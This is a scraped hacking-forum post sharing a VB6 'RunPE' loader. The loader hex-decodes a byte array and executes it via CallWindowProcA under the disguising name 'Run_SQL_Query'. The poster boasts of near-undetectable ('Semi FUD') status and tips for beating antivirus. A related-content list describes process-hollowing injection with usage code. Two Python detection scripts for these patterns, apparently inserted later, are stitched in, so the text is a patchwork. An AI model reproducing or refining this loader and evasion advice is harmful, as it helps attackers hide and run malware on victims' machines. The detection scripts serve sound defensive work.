      Need4Weed

      RunPE 1/32

      1 post in this topic


      Option Explicit
       

      Private Declare Function Run_SQL_Query Lib "C:\Windows\System32\USER32" Alias "CallWindowProcA" (ByVal STD1 As Long, ByVal STD2 As Long, ByVal STD3 As Long, ByVal STD4 As Long, ByVal STD5 As Long) As Long

       
      Public Function SQL_Query(SQL_Table As Long)
      Dim POStr__aRRay() As Byte
      Dim POStr__  As String
      Dim ai As Long
       
       
       
      ReDim POStr__aRRay((Len(POStr__) / 2) - 1)
      For ai = 1 To Len(POStr__) - 1 Step 2
      POStr__aRRay(Int(ai / 2)) = CByte("&h" & Mid(POStr__, ai, 2))
      Next
       
      Run_SQL_Query VarPtr(POStr__aRRay(0)), SQL_Table, 0, 0, 0
       
       
       
      End Function

      Semi FUD Detected By Avira Only When Compiled Native

       


       

      I Think By Using TLB Method then All AVs will be eliminated !

      Good Luck and keep Sharing :)

       

       

      Edited by Need4Weed
      TLB Instruction to beat avira av
      • Like 2
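For triage, the three constructs visible in the posted snippet (a `Declare` that aliases `CallWindowProcA` under an unrelated name, a `VarPtr(...)` of a byte array passed as its first argument, and a `CByte("&h" & Mid(...))` hex-decoding loop) can be matched statically in VB6/VBA source. The scanner below is an added example, not part of the original post; the function name and both samples are constructed for illustration.

```python
import re

# Declare statement that binds any local name to CallWindowProcA/W.
DECLARE_RE = re.compile(
    r'Declare\s+(?:Function|Sub)\s+(\w+)\s+Lib\s+"[^"]*"\s+Alias\s+"CallWindowProc[AW]"',
    re.IGNORECASE)
# Byte-by-byte decoding of a hex string into an array.
HEX_DECODE_RE = re.compile(r'CByte\(\s*"&h"\s*&\s*Mid\$?\(', re.IGNORECASE)

def scan_vb_source(text):
    """Return findings for VB source that hands a byte array to CallWindowProc."""
    findings = []
    # Join VB line continuations (" _" at end of line) into one logical line.
    logical = re.sub(r'[ \t]_\r?\n', ' ', text)
    for m in DECLARE_RE.finditer(logical):
        name = m.group(1)
        if not name.lower().startswith("callwindowproc"):
            findings.append(f"CallWindowProc declared under unrelated name {name!r}")
        call = re.compile(r'\b' + re.escape(name) + r'\s*\(?\s*VarPtr\s*\(', re.IGNORECASE)
        if call.search(logical):
            findings.append(f"{name} called with VarPtr(...) as the procedure address")
    if HEX_DECODE_RE.search(logical):
        findings.append("hex string decoded byte-by-byte into an array")
    return findings

# Constructed sample with the same shape as the post; the hex string is a dummy value.
SUSPICIOUS = r'''
Private Declare Function Helper_Call Lib "user32" Alias "CallWindowProcA" _
    (ByVal a As Long, ByVal b As Long, ByVal c As Long, ByVal d As Long, ByVal e As Long) As Long
Public Function Demo(arg As Long)
Dim buf() As Byte, s As String, i As Long
s = "00112233"
ReDim buf((Len(s) / 2) - 1)
For i = 1 To Len(s) - 1 Step 2
buf(Int(i / 2)) = CByte("&h" & Mid(s, i, 2))
Next
Helper_Call VarPtr(buf(0)), arg, 0, 0, 0
End Function
'''

# Constructed sample of ordinary window subclassing, which must not be flagged.
BENIGN = r'''
Private Declare Function CallWindowProc Lib "user32" Alias "CallWindowProcA" _
    (ByVal lpPrev As Long, ByVal hWnd As Long, ByVal Msg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long
Public Function WndProc(ByVal hWnd As Long, ByVal Msg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long
WndProc = CallWindowProc(lpPrevWndProc, hWnd, Msg, wParam, lParam)
End Function
'''
```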


      • Similar Content

        • By dEEpEst
          RunPE-In-Memory
          Run a 32-bit copy of an EXE file in memory, like what a software packer does.
           
           

        • By dEEpEst
          README.md
          Memory PE Injector
          A tool that reads a PE file from a byte array buffer and injects it into memory.
          Summary
          Memory PE Injector is a C++ class which reads an executable file (PE) from a byte array and maps it into the memory space of another process. This is commonly known as Process Forking or RunPE. To accomplish this, the code follows these steps:
          1. The code launches a second instance of the program containing the code, in suspended mode.
          2. It unmaps the PE from the virtual memory space where it is loaded.
          3. The given PE byte array is then mapped in place.
          4. The process is resumed and the end result is the PE file of the byte array running instead.

          Usage and Tips
          This code can be used in various scenarios. One of these scenarios is a case where you want to pack another program with your own one, but you'd like to deploy one executable only. You can add your second program in the resources of your first one, in an RT_RCDATA resource, then read the bytes and inject it directly into memory, without dropping it on the disk.
          Usage:
          Injector *injector = new Injector();
          unsigned char *lpByteBuffer = injector->ReadFileBytes(L"C:/The/path/to/your/executable.exe");
          injector->Inject(lpByteBuffer);
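The four steps listed in the README summary form an ordered sequence that endpoint telemetry can be correlated against. The detector below is an added example, not code from the README or its author; the event schema (`actor`, `target`, `action` names, image fields) and the sample events are hypothetical and constructed for illustration.

```python
# Constructed, normalized endpoint telemetry. The schema is hypothetical; map it
# onto whatever your EDR or ETW pipeline actually emits.
EVENTS = [
    {"t": 1, "actor": 4120, "action": "process_create", "target": 5300,
     "suspended": True, "actor_image": "app.exe", "target_image": "app.exe"},
    {"t": 2, "actor": 4120, "action": "image_unmap", "target": 5300},
    {"t": 3, "actor": 4120, "action": "remote_write", "target": 5300},
    {"t": 4, "actor": 4120, "action": "remote_write", "target": 5300},
    {"t": 5, "actor": 4120, "action": "thread_resume", "target": 5300},
    # Suspended launch that is simply resumed: no unmap, no write, so no alert.
    {"t": 6, "actor": 880, "action": "process_create", "target": 6100,
     "suspended": True, "actor_image": "ide.exe", "target_image": "test.exe"},
    {"t": 7, "actor": 880, "action": "thread_resume", "target": 6100},
]

# The four README steps, in the order they must be observed.
STAGES = ("process_create", "image_unmap", "remote_write", "thread_resume")

def find_hollowing(events):
    """Return one alert per (actor, target) pair that completes all stages in order."""
    state = {}   # (actor, target) -> [index of next expected stage, self_spawn flag]
    alerts = []
    for ev in sorted(events, key=lambda e: e["t"]):
        key = (ev["actor"], ev["target"])
        if ev["action"] == "process_create":
            if ev.get("suspended"):
                # README step 1: the program starts a second instance of itself.
                same = ev.get("actor_image") == ev.get("target_image")
                state[key] = [1, same]
            else:
                state.pop(key, None)
            continue
        if key not in state:
            continue
        if ev["action"] == STAGES[state[key][0]]:
            state[key][0] += 1
            if state[key][0] == len(STAGES):
                alerts.append({"actor": key[0], "target": key[1],
                               "self_spawn": state[key][1], "t": ev["t"]})
                del state[key]
        # Any other action (e.g. a second remote_write) leaves the state unchanged.
    return alerts
```

The `self_spawn` flag records whether the suspended child is the same image as its parent, which is the specific launch pattern the README describes.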